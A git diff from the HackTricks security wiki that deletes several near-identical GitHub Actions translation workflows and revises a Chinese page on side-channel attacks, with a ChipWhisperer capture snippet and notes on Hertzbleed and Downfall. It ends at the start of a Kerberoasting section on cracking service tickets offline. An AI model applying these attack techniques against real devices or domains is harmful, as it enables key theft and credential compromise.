run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_pl.yml
vendored
119
.github/workflows/translate_pl.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to PL (Polish)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: pl
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Polish
|
||||
BRANCH: pl
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_pt.yml
vendored
119
.github/workflows/translate_pt.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to PT (Portuguese)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: pt
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Portuguese
|
||||
BRANCH: pt
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_sr.yml
vendored
119
.github/workflows/translate_sr.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to SR (Serbian)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: sr
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Serbian
|
||||
BRANCH: sr
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_sw.yml
vendored
119
.github/workflows/translate_sw.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to SW (Swahili)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: sw
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Swahili
|
||||
BRANCH: sw
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_tr.yml
vendored
119
.github/workflows/translate_tr.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to TR (Turkish)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: tr
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Turkish
|
||||
BRANCH: tr
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_uk.yml
vendored
119
.github/workflows/translate_uk.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to UK (Ukranian)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: uk
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Ukranian
|
||||
BRANCH: uk
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_zh.yml
vendored
119
.github/workflows/translate_zh.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to ZH (Chinese)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: zh
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Chinese
|
||||
BRANCH: zh
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
@ -10,7 +10,7 @@
|
||||
|
||||
| 通道 | 典型目标 | 仪器 |
|
||||
|---------|---------------|-----------------|
|
||||
| 功耗 | 智能卡、物联网MCU、FPGA | 示波器 + 分流电阻/高频探头(例如CW503) |
|
||||
| 电力消耗 | 智能卡、物联网MCU、FPGA | 示波器 + 分流电阻/高频探头(例如CW503) |
|
||||
| 电磁场(EM) | CPU、RFID、AES加速器 | H场探头 + LNA,ChipWhisperer/RTL-SDR |
|
||||
| 执行时间/缓存 | 桌面和云CPU | 高精度计时器(rdtsc/rdtscp),远程飞行时间 |
|
||||
| 声学/机械 | 键盘、3D打印机、继电器 | MEMS麦克风,激光振动计 |
|
||||
@ -19,9 +19,9 @@
|
||||
|
||||
---
|
||||
|
||||
## 功率分析
|
||||
## 电力分析
|
||||
|
||||
### 简单功率分析(SPA)
|
||||
### 简单电力分析(SPA)
|
||||
观察*单个*波形并直接将峰值/谷值与操作(例如DES S盒)关联。
|
||||
```python
|
||||
# ChipWhisperer-husky example – capture one AES trace
|
||||
@ -40,7 +40,7 @@ print(trace.wave) # numpy array of power samples
|
||||
import numpy as np
|
||||
corr = np.corrcoef(leakage_model(k), traces[:,sample])
|
||||
```
|
||||
CPA 仍然是最先进的,但机器学习变体(MLA,深度学习 SCA)现在主导了 ASCAD-v2(2023)等比赛。
|
||||
CPA 仍然是最先进的技术,但机器学习变体(MLA,深度学习 SCA)现在主导了 ASCAD-v2(2023)等比赛。
|
||||
|
||||
---
|
||||
|
||||
@ -49,16 +49,12 @@ CPA 仍然是最先进的,但机器学习变体(MLA,深度学习 SCA)现
|
||||
|
||||
---
|
||||
|
||||
## 时序与微架构攻击
|
||||
## 定时与微架构攻击
|
||||
现代 CPU 通过共享资源泄漏秘密:
|
||||
* **Hertzbleed (2022)** – DVFS 频率缩放与 Hamming 权重相关,允许 *远程* 提取 EdDSA 密钥。
|
||||
* **Downfall / Gather Data Sampling (Intel, 2023)** – 瞬态执行读取 SMT 线程中的 AVX-gather 数据。
|
||||
* **Hertzbleed (2022)** – DVFS 频率缩放与汉明权重相关,允许 *远程* 提取 EdDSA 密钥。
|
||||
* **Downfall / Gather Data Sampling (Intel, 2023)** – 瞬态执行读取跨 SMT 线程的 AVX-gather 数据。
|
||||
* **Zenbleed (AMD, 2023) & Inception (AMD, 2023)** – 投机向量误预测泄漏跨域寄存器。
|
||||
|
||||
有关 Spectre 类问题的广泛处理,请参见 {{#ref}}
|
||||
../../cpu-microarchitecture/microarchitectural-attacks.md
|
||||
{{#endref}}
|
||||
|
||||
---
|
||||
|
||||
## 声学与光学攻击
|
||||
@ -95,7 +91,7 @@ CPA 仍然是最先进的,但机器学习变体(MLA,深度学习 SCA)现
|
||||
|
||||
## 工具与框架
|
||||
* **ChipWhisperer-Husky** (2024) – 500 MS/s 示波器 + Cortex-M 触发器;Python API 如上。
|
||||
* **Riscure Inspector & FI** – 商业,支持自动泄漏评估(TVLA-2.0)。
|
||||
* **Riscure Inspector & FI** – 商业,支持自动化泄漏评估(TVLA-2.0)。
|
||||
* **scaaml** – 基于 TensorFlow 的深度学习 SCA 库(v1.2 – 2025)。
|
||||
* **pyecsca** – ANSSI 开源 ECC SCA 框架。
|
||||
|
||||
|
@ -4,172 +4,215 @@
|
||||
|
||||
## Kerberoast
|
||||
|
||||
Kerberoasting 关注于获取 **TGS tickets**,特别是与 **Active Directory (AD)** 中的 **用户账户** 相关的服务,排除 **计算机账户**。这些票证的加密使用源自 **用户密码** 的密钥,从而允许 **离线凭证破解** 的可能性。使用用户账户作为服务的标志是 **"ServicePrincipalName"** 属性非空。
|
||||
